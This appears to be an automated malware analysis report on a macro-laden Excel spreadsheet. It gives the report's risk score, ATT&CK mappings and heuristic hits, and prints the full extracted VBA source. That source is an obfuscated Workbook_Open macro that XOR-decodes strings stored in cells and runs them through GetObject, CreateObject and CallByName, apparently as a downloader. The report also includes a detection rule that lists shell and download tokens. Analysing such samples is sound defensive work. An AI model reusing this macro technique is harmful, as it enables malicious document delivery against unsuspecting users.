MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel spreadsheet containing VBA macros, specifically a Workbook_Open macro. High-severity heuristics indicate the use of CreateObject, GetObject, and CallByName, along with p-code execution, suggesting the macro is designed to run code. The macro's obfuscated nature and the presence of a lure to enable macros point towards a malicious downloader. The script's obfuscation makes it difficult to determine the exact payload or C2, but the overall pattern is consistent with macro-based malware delivery.
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Tracked = GetObject(Hosts).CreateObject(SeniorS) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Tracked = GetObject(Hosts).CreateObject(SeniorS) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4826 bytes |
SHA-256: 7c486c408742231b1cc860bbac34c2c89d4d5d54163a9235ba1ed9e9be7b21c9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Hosts As String
Private SeniorS As String
Private Dialogue As String
Private Function IsraelI(ByVal Lookup As String) As Variant
Dim Equation As Long: Equation = 0: Dim Billing() As Byte: Dim Branches() As Byte, Crossing As String, Recall As Integer
Branches = "qf5457bf92"
GoTo Customized
Psychological:
Dim SpecialiStS As String
SpecialiStS = InputBox("temper cool")
Bunch:
If Equation < UBound(Billing) Then
Recall = Equation Mod (10)
GoTo Litigation
InteractIons:
Crossing = Crossing & Chr(Billing(Equation))
Equation = Equation + 1
GoTo Bunch
Else
GoTo Nurses
End If
Charlie:
Dim Bargains As String
Bargains = InputBox("setem ponutn")
Nurses:
IsraelI = Crossing
Exit Function
Customized:
Billing = Destruction(Lookup)
GoTo Bunch
Litigation:
Billing(Equation) = Abs(Billing(Equation) Xor Branches(Recall * 2))
GoTo InteractIons
End Function
Private Sub SymbolS()
Dim Tracked As Object
Dim EngagEmEnt As String
GoTo InteractIons
SubmiSSionS:
Dialogue = IsraelI(Dialogue)
MeMphis Tracked, EngagEmEnt
Exit Sub
Understood:
Hosts = IsraelI(Hosts)
EngagEmEnt = IsraelI(EngagEmEnt)
SeniorS = IsraelI(SeniorS)
Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
GoTo SubmiSSionS
Dim Crossing As String
Crossing = InputBox("pass")
MsgBox Crossing
Hosts = Crossing
InteractIons:
Hosts = Sheets("b73fa").Range("J110").Value: EngagEmEnt = Sheets("b73fa").Range("J189").Value: SeniorS = Sheets("b73fa").Range("G163").Value: Dialogue = Sheets("b73fa").Range("G170").Value
GoTo Understood
End Sub
Sub MeMphis(ByVal Tracked As Object, ByVal EngagEmEnt As String)
CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0
End Sub
Sub Workbook_Open()
GoTo Margin
Dim Bargains As String
Bargains = InputBox("Put err code")
Dim SpecialiStS As String
SpecialiStS = InputBox("Optimisrt")
MsgBox SpecialiStS
Margin:
If Bargains = "" Then
SymbolS
End If
End Sub
Private Function Destruction(ByVal Charlie As String) As Variant
Dim Crossing() As Byte, i As Long, Recall As Integer, Margin As Integer
Margin = Len(Charlie) / 2: i = 0: ReDim Crossing(0 To Margin) As Byte
Bargains:
If i < Len(Charlie) Then
Recall = Recall + 1
Crossing(Recall - 1) = Chr(14 + (12 * 2)) & Chr((16 + (4 * 5)) * 2) & Mid(Charlie, i + 1, 2)
i = i + 2
GoTo Bargains
Else
GoTo SpecialiStS
Dim Litigation As String
Litigation = InputBox("Autoscale calculation")
End If
SpecialiStS:
Destruction = Crossing
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.